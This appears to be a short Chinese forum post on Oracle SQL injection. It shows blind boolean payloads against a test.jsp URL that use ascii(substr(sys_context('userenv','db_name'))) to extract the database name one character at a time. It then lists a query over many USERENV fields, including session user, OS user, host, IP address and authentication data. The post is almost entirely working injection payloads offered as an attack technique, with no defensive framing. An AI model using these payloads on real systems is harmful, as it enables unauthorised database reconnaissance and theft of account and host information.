Oracle注入sys_context利用
Oracle可以用sys_context来获取基本信息,记录如下:http://www.nuanyue.com/test.jsp=1′ and ascii(substr(length((sys_context(‘userenv’,'db_name’))),0,1))=89
检查db_name的字符个数的 的ASCII值是89
http://www.nuanyue.com/test.jsp=1′ and ascii(substr((sys_context(‘userenv’,'db_name’)),1,1))=109
http://www.nuanyue.com/test.jsp=1′ and ascii(substr((sys_context(‘userenv’,'db_name’)),2,1))>0
//获取第一个字符的ASCII值,其它类推,以下是可以获取的信息。
selectSYS_CONTEXT(‘USERENV’,'TERMINAL’) terminal,SYS_CONTEXT(‘USERENV’,'LANGUAGE’) language,SYS_CONTEXT(‘USERENV’,'SESSIONID’) sessionid,SYS_CONTEXT(‘USERENV’,'INSTANCE’) instance,SYS_CONTEXT(‘USERENV’,'ENTRYID’) entryid,SYS_CONTEXT(‘USERENV’,'ISDBA’) isdba,SYS_CONTEXT(‘USERENV’,'NLS_TERRITORY’) nls_territory,SYS_CONTEXT(‘USERENV’,'NLS_CURRENCY’) nls_currency,SYS_CONTEXT(‘USERENV’,'NLS_CALENDAR’) nls_calendar,SYS_CONTEXT(‘USERENV’,'NLS_DATE_FORMAT’) nls_date_format,SYS_CONTEXT(‘USERENV’,'NLS_DATE_LANGUAGE’) nls_date_language,SYS_CONTEXT(‘USERENV’,'NLS_SORT’) nls_sort,SYS_CONTEXT(‘USERENV’,'CURRENT_USER’) current_user,SYS_CONTEXT(‘USERENV’,'CURRENT_USERID’) current_userid,SYS_CONTEXT(‘USERENV’,'SESSION_USER’) session_user,SYS_CONTEXT(‘USERENV’,'SESSION_USERID’) session_userid,SYS_CONTEXT(‘USERENV’,'PROXY_USER’) proxy_user,SYS_CONTEXT(‘USERENV’,'PROXY_USERID’) proxy_userid,SYS_CONTEXT(‘USERENV’,'DB_DOMAIN’) db_domain,SYS_CONTEXT(‘USERENV’,'DB_NAME’) db_name,SYS_CONTEXT(‘USERENV’,'HOST’) host,SYS_CONTEXT(‘USERENV’,'OS_USER’) os_user,SYS_CONTEXT(‘USERENV’,'EXTERNAL_NAME’) external_name,SYS_CONTEXT(‘USERENV’,'IP_ADDRESS’) ip_address,SYS_CONTEXT(‘USERENV’,'NETWORK_PROTOCOL’) network_protocol,SYS_CONTEXT(‘USERENV’,'BG_JOB_ID’) bg_job_id,SYS_CONTEXT(‘USERENV’,'FG_JOB_ID’) fg_job_id,SYS_CONTEXT(‘USERENV’,'AUTHENTICATION_TYPE’) authentication_type,SYS_CONTEXT(‘USERENV’,'AUTHENTICATION_DATA’) authentication_datafrom dual
页:
[1]